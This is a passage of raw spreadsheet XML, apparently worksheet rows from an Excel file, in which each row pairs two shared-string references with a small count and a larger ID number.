      </c>
    </row>
    <row r="22695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22695" t="s">
        <v>16230</v>
      </c>
      <c r="B22695" t="s">
        <v>16220</v>
      </c>
      <c r="C22695">
        <v>0</v>
      </c>
      <c r="D22695">
        <v>5789</v>
      </c>
    </row>
    <row r="22696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22696" t="s">
        <v>16229</v>
      </c>
      <c r="B22696" t="s">
        <v>16221</v>
      </c>
      <c r="C22696">
        <v>6</v>
      </c>
      <c r="D22696">
        <v>5789</v>
      </c>
    </row>
    <row r="22697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22697" t="s">
        <v>16230</v>
      </c>
      <c r="B22697" t="s">
        <v>16222</v>
      </c>
      <c r="C22697">
        <v>9</v>
      </c>
      <c r="D22697">
        <v>5789</v>
      </c>
    </row>
    <row r="22698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22698" t="s">
        <v>16223</v>
      </c>
      <c r="B22698" t="s">
        <v>16223</v>
      </c>
      <c r="C22698">
        <v>26</v>
      </c>
      <c r="D22698">
        <v>5789</v>
      </c>
    </row>
    <row r="22699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22699" t="s">
        <v>16224</v>
      </c>
      <c r="B22699" t="s">
        <v>16224</v>
      </c>
      <c r="C22699">
        <v>0</v>
      </c>
      <c r="D22699">
        <v>5789</v>
      </c>
    </row>
    <row r="22700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22700" t="s">
        <v>16228</v>
      </c>
      <c r="B22700" t="s">
        <v>16211</v>
      </c>
      <c r="C22700">
        <v>0</v>
      </c>
      <c r="D22700">
        <v>5939</v>
      </c>
    </row>
    <row r="22701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22701" t="s">
        <v>16231</v>
      </c>
      <c r="B22701" t="s">
        <v>16212</v>
      </c>
      <c r="C22701">
        <v>0</v>
      </c>
      <c r="D22701">
        <v>5939</v>
      </c>
    </row>
    <row r="22702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22702" t="s">
        <v>16228</v>
      </c>
      <c r="B22702" t="s">
        <v>16213</v>
      </c>
      <c r="C22702">
        <v>0</v>
      </c>
      <c r="D22702">
        <v>5939</v>
      </c>
    </row>
    <row r="22703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22703" t="s">
        <v>16231</v>
      </c>
      <c r="B22703" t="s">
        <v>16214</v>
      </c>
      <c r="C22703">
        <v>0</v>
      </c>
      <c r="D22703">
        <v>5939</v>
      </c>
    </row>
    <row r="22704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22704" t="s">
        <v>16228</v>
      </c>
      <c r="B22704" t="s">
        <v>16215</v>
      </c>
      <c r="C22704">
        <v>1</v>
      </c>
      <c r="D22704">
        <v>5939</v>
      </c>
    </row>
    <row r="22705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22705" t="s">
        <v>16231</v>
      </c>
      <c r="B22705" t="s">
        <v>16216</v>
      </c>
      <c r="C22705">
        <v>0</v>
      </c>
      <c r="D22705">
        <v>5939</v>
      </c>
    </row>
    <row r="22706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22706" t="s">
        <v>16228</v>
      </c>
      <c r="B22706" t="s">
        <v>16217</v>
      </c>
      <c r="C22706">
        <v>4</v>
      </c>
      <c r="D22706">
        <v>5939</v>
      </c>
    </row>
    <row r="22707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22707" t="s">
        <v>16231</v>
      </c>
      <c r="B22707" t="s">
        <v>16218</v>
      </c>
      <c r="C22707">
        <v>0</v>
      </c>
      <c r="D22707">
        <v>5939</v>
      </c>
    </row>
    <row r="22708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22708" t="s">
        <v>16229</v>
      </c>
      <c r="B22708" t="s">
        <v>16219</v>
      </c>
      <c r="C22708">
        <v>0</v>
      </c>
      <c r="D22708">
        <v>5939</v>
      </c>
    </row>
    <row r="22709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22709" t="s">
        <v>16230</v>
      </c>
      <c r="B22709" t="s">
        <v>16220</v>
      </c>
      <c r="C22709">
        <v>1</v>
      </c>
      <c r="D22709">
        <v>5939</v>
      </c>
    </row>
    <row r="22710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22710" t="s">
        <v>16229</v>
      </c>
      <c r="B22710" t="s">
        <v>16221</v>
      </c>
      <c r="C22710">
        <v>7</v>
      </c>
      <c r="D22710">
        <v>5939</v>
      </c>
    </row>
    <row r="22711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22711" t="s">
        <v>16230</v>
      </c>
      <c r="B22711" t="s">
        <v>16222</v>
      </c>
      <c r="C22711">
        <v>2</v>
      </c>
      <c r="D22711">
        <v>5939</v>
      </c>
    </row>
    <row r="22712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22712" t="s">
        <v>16223</v>
      </c>
      <c r="B22712" t="s">
        <v>16223</v>
      </c>
      <c r="C22712">
        <v>30</v>
      </c>
      <c r="D22712">
        <v>5939</v>
      </c>
    </row>
    <row r="22713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22713" t="s">
        <v>16224</v>
      </c>
      <c r="B22713" t="s">
        <v>16224</v>
      </c>
      <c r="C22713">
        <v>1</v>
      </c>
      <c r="D22713">
        <v>5939</v>
      </c>
    </row>
    <row r="22714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22714" t="s">
        <v>16228</v>
      </c>
      <c r="B22714" t="s">
        <v>16211</v>
      </c>
      <c r="C22714">
        <v>0</v>
      </c>
      <c r="D22714">
        <v>145</v>
      </c>
    </row>
    <row r="22715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22715" t="s">
        <v>16228</v>
      </c>
      <c r="B22715" t="s">
        <v>16213</v>
      </c>
      <c r="C22715">
        <v>2</v>
      </c>
      <c r="D22715">
        <v>145</v>
      </c>
    </row>
    <row r="22716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22716" t="s">
        <v>16231</v>
      </c>
      <c r="B22716" t="s">
        <v>16214</v>
      </c>
      <c r="C22716">
        <v>3</v>
      </c>
      <c r="D22716">
        <v>145</v>
      </c>
    </row>
    <row r="22717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22717" t="s">
        <v>16228</v>
      </c>
      <c r="B22717" t="s">
        <v>16211</v>
      </c>
      <c r="C22717">
        <v>0</v>
      </c>
      <c r="D22717">
        <v>5424</v>
      </c>
    </row>
    <row r="22718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22718" t="s">
        <v>16231</v>
      </c>
      <c r="B22718" t="s">
        <v>16212</v>
      </c>
      <c r="C22718">
        <v>0</v>
      </c>
      <c r="D22718">
        <v>5424</v>
      </c>
    </row>
    <row r="22719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22719" t="s">
        <v>16228</v>
      </c>
      <c r="B22719" t="s">
        <v>16213</v>
      </c>
      <c r="C22719">
        <v>0</v>
      </c>
      <c r="D22719">
        <v>5424</v>
      </c>
    </row>
    <row r="22720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22720" t="s">
        <v>16231</v>
      </c>
      <c r="B22720" t="s">
        <v>16214</v>
      </c>
      <c r="C22720">
        <v>0</v>
      </c>
      <c r="D22720">
        <v>5424</v>
      </c>
    </row>
    <row r="22721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22721" t="s">
        <v>16228</v>
      </c>
      <c r="B22721" t="s">
        <v>16215</v>
      </c>
      <c r="C22721">
        <v>0</v>
      </c>
      <c r="D22721">
        <v>5424</v>
      </c>
    </row>
    <row r="22722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22722" t="s">
        <v>16231</v>
      </c>
      <c r="B22722" t="s">
        <v>16216</v>
      </c>
      <c r="C22722">
        <v>0</v>
      </c>
      <c r="D22722">
        <v>5424</v>
      </c>
    </row>
    <row r="22723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22723" t="s">
        <v>16228</v>
      </c>
      <c r="B22723" t="s">
        <v>16217</v>
      </c>
      <c r="C22723">
        <v>0</v>
      </c>
      <c r="D22723">
        <v>5424</v>
      </c>
    </row>
    <row r="22724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22724" t="s">
        <v>16231</v>
      </c>
      <c r="B22724" t="s">
        <v>16218</v>
      </c>
      <c r="C22724">
        <v>0</v>
      </c>
      <c r="D22724">
        <v>5424</v>
      </c>
    </row>
    <row r="22725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22725" t="s">
        <v>16229</v>
      </c>
      <c r="B22725" t="s">
        <v>16219</v>
      </c>
      <c r="C22725">
        <v>0</v>
      </c>
      <c r="D22725">
        <v>5424</v>
      </c>
    </row>
    <row r="22726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22726" t="s">
        <v>16230</v>
      </c>
      <c r="B22726" t="s">
        <v>16220</v>
      </c>
      <c r="C22726">
        <v>1</v>
      </c>
      <c r="D22726">
        <v>5424</v>
      </c>
    </row>
    <row r="22727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22727" t="s">
        <v>16229</v>
      </c>
      <c r="B22727" t="s">
        <v>16221</v>
      </c>
      <c r="C22727">
        <v>2</v>
      </c>
      <c r="D22727">
        <v>5424</v>
      </c>
    </row>
    <row r="22728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22728" t="s">
        <v>16230</v>
      </c>
      <c r="B22728" t="s">
        <v>16222</v>
      </c>
      <c r="C22728">
        <v>6</v>
      </c>
      <c r="D22728">
        <v>5424</v>
      </c>
    </row>
    <row r="22729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22729" t="s">
        <v>16223</v>
      </c>
      <c r="B22729" t="s">
        <v>16223</v>
      </c>
      <c r="C22729">
        <v>0</v>
      </c>
      <c r="D22729">
        <v>5424</v>
      </c>
    </row>
    <row r="22730" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22730" t="s">
        <v>16224</v>
      </c>
      <c r="B22730" t="s">
        <v>16224</v>
      </c>
      <c r="C22730">
        <v>0</v>
      </c>
      <c r="D22730">
        <v>5424</v>
      </c>
    </row>
    <row r="22731" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22731" t="s">
        <v>16228</v>
      </c>
      <c r="B22731" t="s">
        <v>16211</v>
      </c>
      <c r="C22731">
        <v>0</v>
      </c>
      <c r="D22731">
        <v>5806</v>
      </c>
    </row>
    <row r="22732" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22732" t="s">
        <v>16231</v>
      </c>
      <c r="B22732" t="s">
        <v>16212</v>
      </c>
      <c r="C22732">
        <v>0</v>
      </c>
      <c r="D22732">
        <v>5806</v>
      </c>
    </row>
    <row r="22733" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22733" t="s">
        <v>16228</v>
      </c>
      <c r="B22733" t="s">
        <v>16213</v>
      </c>
      <c r="C22733">
        <v>0</v>
      </c>
      <c r="D22733">
        <v>5806</v>
      </c>
    </row>
    <row r="22734" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22734" t="s">
        <v>16231</v>
      </c>
      <c r="B22734" t="s">
        <v>16214</v>
      </c>
      <c r="C22734">
        <v>0</v>
      </c>
      <c r="D22734">
        <v>5806</v>
      </c>
    </row>
    <row r="22735" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22735" t="s">
        <v>16228</v>
      </c>
      <c r="B22735" t="s">
        <v>16215</v>
      </c>
      <c r="C22735">
        <v>3</v>
      </c>
      <c r="D22735">
        <v>5806</v>
      </c>
    </row>
    <row r="22736" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22736" t="s">
        <v>16231</v>
      </c>
      <c r="B22736" t="s">
        <v>16216</v>
      </c>
      <c r="C22736">
        <v>3</v>
      </c>
      <c r="D22736">
        <v>5806</v>
      </c>
    </row>
    <row r="22737" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22737" t="s">
        <v>16228</v>
      </c>
      <c r="B22737" t="s">
        <v>16217</v>
      </c>
      <c r="C22737">
        <v>3</v>
      </c>
      <c r="D22737">
        <v>5806</v>
      </c>
    </row>
    <row r="22738" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22738" t="s">
        <v>16231</v>
      </c>
      <c r="B22738" t="s">
        <v>16218</v>
      </c>
      <c r="C22738">
        <v>17</v>
      </c>
      <c r="D22738">
        <v>5806</v>
      </c>
    </row>
    <row r="22739" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22739" t="s">
        <v>16229</v>
      </c>
      <c r="B22739" t="s">
        <v>16219</v>
      </c>
      <c r="C22739">
        <v>0</v>
      </c>
      <c r="D22739">
        <v>5806</v>
      </c>
    </row>
    <row r="22740" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22740" t="s">
        <v>16230</v>
      </c>
      <c r="B22740" t="s">
        <v>16220</v>
      </c>
      <c r="C22740">
        <v>0</v>
      </c>
      <c r="D22740">
        <v>5806</v>
      </c>
    </row>
    <row r="22741" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22741" t="s">
        <v>16229</v>
      </c>
      <c r="B22741" t="s">
        <v>16221</v>
      </c>
      <c r="C22741">
        <v>0</v>
      </c>
      <c r="D22741">
        <v>5806</v>
      </c>
    </row>
    <row r="22742" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22742" t="s">
        <v>16230</v>
      </c>
      <c r="B22742" t="s">
        <v>16222</v>
      </c>
      <c r="C22742">
        <v>0</v>
      </c>
      <c r="D22742">
        <v>5806</v>
      </c>
    </row>
    <row r="22743" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22743" t="s">
        <v>16223</v>
      </c>
      <c r="B22743" t="s">
        <v>16223</v>
      </c>
      <c r="C22743">
        <v>0</v>
      </c>
      <c r="D22743">
        <v>5806</v>
      </c>
    </row>
    <row r="22744" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22744" t="s">
        <v>16224</v>
      </c>
      <c r="B22744" t="s">
        <v>16224</v>
      </c>
      <c r="C22744">
        <v>0</v>
      </c>
      <c r="D22744">
        <v>5806</v>
      </c>
    </row>
    <row r="22745" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22745" t="s">
        <v>16228</v>
      </c>
      <c r="B22745" t="s">
        <v>16211</v>
      </c>
      <c r="C22745">
        <v>0</v>
      </c>
      <c r="D22745">
        <v>5621</v>
      </c>
    </row>
    <row r="22746" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22746" t="s">
        <v>16231</v>
      </c>
      <c r="B22746" t="s">
        <v>16212</v>
      </c>
      <c r="C22746">
        <v>0</v>
      </c>
      <c r="D22746">
        <v>5621</v>
      </c>
    </row>
    <row r="22747" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22747" t="s">
        <v>16228</v>
      </c>
      <c r="B22747" t="s">
        <v>16213</v>
      </c>
      <c r="C22747">
        <v>0</v>
      </c>
      <c r="D22747">
        <v>5621</v>
      </c>
    </row>
    <row r="22748" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22748" t="s">
        <v>16231</v>
      </c>
      <c r="B22748" t="s">
        <v>16214</v>
      </c>
      <c r="C22748">
        <v>0</v>
      </c>
      <c r="D22748">
        <v>5621</v>
      </c>
    </row>
    <row r="22749" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22749" t="s">
        <v>16228</v>
      </c>
      <c r="B22749" t="s">
        <v>16215</v>
      </c>
      <c r="C22749">
        <v>10</v>
      </c>
      <c r="D22749">
        <v>5621</v>
      </c>
    </row>
    <row r="22750" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22750" t="s">
        <v>16231</v>
      </c>
      <c r="B22750" t="s">
        <v>16216</v>
      </c>
      <c r="C22750">
        <v>10</v>
      </c>
      <c r="D22750">
        <v>5621</v>
      </c>
    </row>
    <row r="22751" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22751" t="s">
        <v>16228</v>
      </c>
      <c r="B22751" t="s">
        <v>16217</v>
      </c>
      <c r="C22751">
        <v>0</v>
      </c>
      <c r="D22751">
        <v>5621</v>
      </c>
    </row>
    <row r="22752" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22752" t="s">
        <v>16231</v>
      </c>
      <c r="B22752" t="s">
        <v>16218</v>
      </c>
      <c r="C22752">
        <v>0</v>
      </c>
      <c r="D22752">
        <v>5621</v>
      </c>
    </row>
    <row r="22753" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22753" t="s">
        <v>16229</v>
      </c>
      <c r="B22753" t="s">
        <v>16219</v>
      </c>
      <c r="C22753">
        <v>0</v>
      </c>
      <c r="D22753">
        <v>5621</v>
      </c>
    </row>
    <row r="22754" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22754" t="s">
        <v>16230</v>
      </c>
      <c r="B22754" t="s">
        <v>16220</v>
      </c>
      <c r="C22754">
        <v>0</v>
      </c>
      <c r="D22754">
        <v>5621</v>
      </c>
    </row>
    <row r="22755" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22755" t="s">
        <v>16229</v>
      </c>
      <c r="B22755" t="s">
        <v>16221</v>
      </c>
      <c r="C22755">
        <v>0</v>
      </c>
      <c r="D22755">
        <v>5621</v>
      </c>
    </row>
    <row r="22756" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22756" t="s">
        <v>16230</v>
      </c>
      <c r="B22756" t="s">
        <v>16222</v>
      </c>
      <c r="C22756">
        <v>0</v>
      </c>
      <c r="D22756">
        <v>5621</v>
      </c>
    </row>
    <row r="22757" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22757" t="s">
        <v>16223</v>
      </c>
      <c r="B22757" t="s">
        <v>16223</v>
      </c>
      <c r="C22757">
        <v>0</v>
      </c>
      <c r="D22757">
        <v>5621</v>
      </c>
    </row>
    <row r="22758" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22758" t="s">
        <v>16224</v>
      </c>
      <c r="B22758" t="s">
        <v>16224</v>
      </c>
      <c r="C22758">
        <v>0</v>
      </c>
      <c r="D22758">
        <v>5621</v>
      </c>
    </row>
    <row r="22759" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22759" t="s">
        <v>16228</v>
      </c>
      <c r="B22759" t="s">
        <v>16211</v>
      </c>
      <c r="C22759">
        <v>0</v>
      </c>
      <c r="D22759">
        <v>2333</v>
      </c>
    </row>
    <row r="22760" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22760" t="s">
        <v>16231</v>
      </c>
      <c r="B22760" t="s">
        <v>16212</v>
      </c>
      <c r="C22760">
        <v>0</v>
      </c>
      <c r="D22760">
        <v>2333</v>
      </c>
    </row>
    <row r="22761" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22761" t="s">
        <v>16228</v>
      </c>
      <c r="B22761" t="s">
        <v>16213</v>
      </c>
      <c r="C22761">
        <v>0</v>
      </c>
      <c r="D22761">
        <v>2333</v>
      </c>
    </row>
    <row r="22762" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22762" t="s">
        <v>16231</v>
      </c>
      <c r="B22762" t="s">
        <v>16214</v>
      </c>
      <c r="C22762">
        <v>0</v>
      </c>
      <c r="D22762">
        <v>2333</v>
      </c>
    </row>
    <row r="22763" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22763" t="s">
        <v>16228</v>
      </c>
      <c r="B22763" t="s">
        <v>16215</v>
      </c>
      <c r="C22763">
        <v>1</v>
      </c>
      <c r="D22763">
        <v>2333</v>
      </c>
    </row>
    <row r="22764" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22764" t="s">
        <v>16231</v>
      </c>
      <c r="B22764" t="s">
        <v>16216</v>
      </c>
      <c r="C22764">
        <v>0</v>
      </c>
      <c r="D22764">
        <v>2333</v>
      </c>
    </row>
    <row r="22765" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22765" t="s">
        <v>16228</v>
      </c>
      <c r="B22765" t="s">
        <v>16217</v>
      </c>
      <c r="C22765">
        <v>0</v>
      </c>
      <c r="D22765">
        <v>2333</v>
      </c>
    </row>
    <row r="22766" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22766" t="s">
        <v>16231</v>
      </c>
      <c r="B22766" t="s">
        <v>16218</v>
      </c>
      <c r="C22766">
        <v>0</v>
      </c>
      <c r="D22766">
        <v>2333</v>
      </c>
    </row>
    <row r="22767" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22767" t="s">
        <v>16229</v>
      </c>
      <c r="B22767" t="s">
        <v>16219</v>
      </c>
      <c r="C22767">
        <v>0</v>
      </c>
      <c r="D22767">
        <v>2333</v>
      </c>
    </row>
    <row r="22768" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22768" t="s">
        <v>16230</v>
      </c>
      <c r="B22768" t="s">
        <v>16220</v>
      </c>
      <c r="C22768">
        <v>2</v>
      </c>
      <c r="D22768">
        <v>2333</v>
      </c>
    </row>
    <row r="22769" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22769" t="s">
        <v>16229</v>
      </c>
      <c r="B22769" t="s">
        <v>16221</v>
      </c>
      <c r="C22769">
        <v>6</v>
      </c>
      <c r="D22769">
        <v>2333</v>
      </c>
    </row>
    <row r="22770" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22770" t="s">
        <v>16230</v>
      </c>
      <c r="B22770" t="s">
        <v>16222</v>
      </c>
      <c r="C22770">
        <v>70</v>
      </c>
      <c r="D22770">
        <v>2333</v>
      </c>
    </row>
    <row r="22771" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22771" t="s">
        <v>16223</v>
      </c>
      <c r="B22771" t="s">
        <v>16223</v>
      </c>
      <c r="C22771">
        <v>0</v>
      </c>
      <c r="D22771">
        <v>2333</v>
      </c>
    </row>
    <row r="22772" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22772" t="s">
        <v>16224</v>
      </c>
      <c r="B22772" t="s">
        <v>16224</v>
      </c>
      <c r="C22772">
        <v>0</v>
      </c>
      <c r="D22772">
        <v>2333</v>
      </c>
    </row>
    <row r="22773" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22773" t="s">
        <v>16228</v>
      </c>
      <c r="B22773" t="s">
        <v>16211</v>
      </c>
      <c r="C22773">
        <v>0</v>
      </c>
      <c r="D22773">
        <v>5764</v>
      </c>
    </row>
    <row r="22774" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22774" t="s">
        <v>16231</v>
      </c>
      <c r="B22774" t="s">
        <v>16212</v>
      </c>
      <c r="C22774">
        <v>0</v>
      </c>
      <c r="D22774">
        <v>5764</v>
      </c>
    </row>
    <row r="22775" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22775" t="s">
        <v>16228</v>
      </c>
      <c r="B22775" t="s">
        <v>16213</v>
      </c>
      <c r="C22775">
        <v>0</v>
      </c>
      <c r="D22775">
        <v>5764</v>
      </c>
    </row>
    <row r="22776" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22776" t="s">
        <v>16231</v>
      </c>
      <c r="B22776" t="s">
        <v>16214</v>
      </c>
      <c r="C22776">
        <v>0</v>
      </c>
      <c r="D22776">
        <v>5764</v>
      </c>
    </row>
    <row r="22777" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22777" t="s">
        <v>16228</v>
      </c>
      <c r="B22777" t="s">
        <v>16215</v>
      </c>
      <c r="C22777">
        <v>0</v>
      </c>
      <c r="D22777">
        <v>5764</v>
      </c>
    </row>
    <row r="22778" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22778" t="s">
        <v>16231</v>
      </c>
      <c r="B22778" t="s">
        <v>16216</v>
      </c>
      <c r="C22778">
        <v>1</v>
      </c>
      <c r="D22778">
        <v>5764</v>
      </c>
    </row>
    <row r="22779" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22779" t="s">
        <v>16228</v>
      </c>
      <c r="B22779" t="s">
        <v>16217</v>
      </c>
      <c r="C22779">
        <v>2</v>
      </c>
      <c r="D22779">
        <v>5764</v>
      </c>
    </row>
    <row r="22780" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22780" t="s">
        <v>16231</v>
      </c>
      <c r="B22780" t="s">
        <v>16218</v>
      </c>
      <c r="C22780">
        <v>0</v>
      </c>
      <c r="D22780">
        <v>5764</v>
      </c>
    </row>
    <row r="22781" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22781" t="s">
        <v>16229</v>
      </c>
      <c r="B22781" t="s">
        <v>16219</v>
      </c>
      <c r="C22781">
        <v>0</v>
      </c>
      <c r="D22781">
        <v>5764</v>
      </c>
    </row>
    <row r="22782" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22782" t="s">
        <v>16230</v>
      </c>
      <c r="B22782" t="s">
        <v>16220</v>
      </c>
      <c r="C22782">
        <v>0</v>
      </c>
      <c r="D22782">
        <v>5764</v>
      </c>
    </row>
    <row r="22783" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22783" t="s">
        <v>16229</v>
      </c>
      <c r="B22783" t="s">
        <v>16221</v>
      </c>
      <c r="C22783">
        <v>1</v>
      </c>
      <c r="D22783">
        <v>5764</v>
      </c>
    </row>
    <row r="22784" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22784" t="s">
        <v>16230</v>
      </c>
      <c r="B22784" t="s">
        <v>16222</v>
      </c>
      <c r="C22784">
        <v>0</v>
      </c>
      <c r="D22784">
        <v>5764</v>
      </c>
    </row>
    <row r="22785" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22785" t="s">
        <v>16223</v>
      </c>
      <c r="B22785" t="s">
        <v>16223</v>
      </c>
      <c r="C22785">
        <v>24</v>
      </c>
      <c r="D22785">
        <v>5764</v>
      </c>
    </row>
    <row r="22786" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22786" t="s">
        <v>16224</v>
      </c>
      <c r="B22786" t="s">
        <v>16224</v>
      </c>
      <c r="C22786">
        <v>1</v>
      </c>
      <c r="D22786">
        <v>5764</v>
      </c>
    </row>
    <row r="22787" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22787" t="s">
        <v>16228</v>
      </c>
      <c r="B22787" t="s">
        <v>16211</v>
      </c>
      <c r="C22787">
        <v>0</v>
      </c>
      <c r="D22787">
        <v>5938</v>
      </c>
    </row>
    <row r="22788" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22788" t="s">
        <v>16231</v>
      </c>
      <c r="B22788" t="s">
        <v>16212</v>
      </c>
      <c r="C22788">
        <v>0</v>
      </c>
      <c r="D22788">
        <v>5938</v>
      </c>
    </row>
    <row r="22789" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22789" t="s">
        <v>16228</v>
      </c>
      <c r="B22789" t="s">
        <v>16213</v>
      </c>
      <c r="C22789">
        <v>0</v>
      </c>
      <c r="D22789">
        <v>5938</v>
      </c>
    </row>
    <row r="22790" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22790" t="s">
        <v>16231</v>
      </c>
      <c r="B22790" t="s">
        <v>16214</v>
      </c>
      <c r="C22790">
        <v>0</v>
      </c>
      <c r="D22790">
        <v>5938</v>
      </c>
    </row>
    <row r="22791" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22791" t="s">
        <v>16228</v>
      </c>
      <c r="B22791" t="s">
        <v>16215</v>
      </c>
      <c r="C22791">
        <v>1</v>
      </c>
      <c r="D22791">
        <v>5938</v>
      </c>
    </row>
    <row r="22792" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22792" t="s">
        <v>16231</v>
      </c>
      <c r="B22792" t="s">
        <v>16216</v>
      </c>
      <c r="C22792">
        <v>7</v>
      </c>
      <c r="D22792">
        <v>5938</v>
      </c>
    </row>
    <row r="22793" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22793" t="s">
        <v>16228</v>
      </c>
      <c r="B22793" t="s">
        <v>16217</v>
      </c>
      <c r="C22793">
        <v>10</v>
      </c>
      <c r="D22793">
        <v>5938</v>
      </c>
    </row>
    <row r="22794" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22794" t="s">
        <v>16231</v>
      </c>
      <c r="B22794" t="s">
        <v>16218</v>
      </c>
      <c r="C22794">
        <v>0</v>
      </c>
      <c r="D22794">
        <v>5938</v>
      </c>
    </row>
    <row r="22795" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22795" t="s">
        <v>16229</v>
      </c>
      <c r="B22795" t="s">
        <v>16219</v>
      </c>
      <c r="C22795">
        <v>0</v>
      </c>
      <c r="D22795">
        <v>5938</v>
      </c>
    </row>
    <row r="22796" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22796" t="s">
        <v>16230</v>
      </c>
      <c r="B22796" t="s">
        <v>16220</v>
      </c>
      <c r="C22796">
        <v>0</v>
      </c>
      <c r="D22796">
        <v>5938</v>
      </c>
    </row>
    <row r="22797" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22797" t="s">
        <v>16229</v>
      </c>
      <c r="B22797" t="s">
        <v>16221</v>
      </c>
      <c r="C22797">
        <v>0</v>
      </c>
      <c r="D22797">
        <v>5938</v>
      </c>
    </row>
    <row r="22798" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22798" t="s">
        <v>16230</v>
      </c>
      <c r="B22798" t="s">
        <v>16222</v>
      </c>
      <c r="C22798">
        <v>0</v>
      </c>
      <c r="D22798">
        <v>5938</v>
      </c>
    </row>
    <row r="22799" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22799" t="s">
        <v>16223</v>
      </c>
      <c r="B22799" t="s">
        <v>16223</v>
      </c>
      <c r="C22799">
        <v>24</v>
      </c>
